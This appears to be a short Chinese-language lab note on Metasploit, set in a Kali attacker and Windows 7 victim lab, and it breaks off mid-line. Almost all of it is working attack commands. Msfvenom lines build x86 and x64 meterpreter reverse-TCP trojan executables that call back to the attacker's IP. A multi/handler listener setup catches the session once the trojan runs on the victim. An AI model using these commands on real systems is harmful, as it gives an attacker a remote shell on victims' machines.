环境
攻击机:kali
ip:192.168.232.129
被攻击机:win7
ip:192.168.232.140
MSF木马生成
windows_x86_payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.129 LPORT=4444 -f exe > shell.exe
windows_x64_payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.129 LPORT=4444 -f exe > shell.exe
对应系统生成,x86在64位系统上也能用,但有时一些模块使用会出错。
设置监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.232.129
set lport 4444
exploit
在被攻击机上运行木马,上线
进行进程迁移&#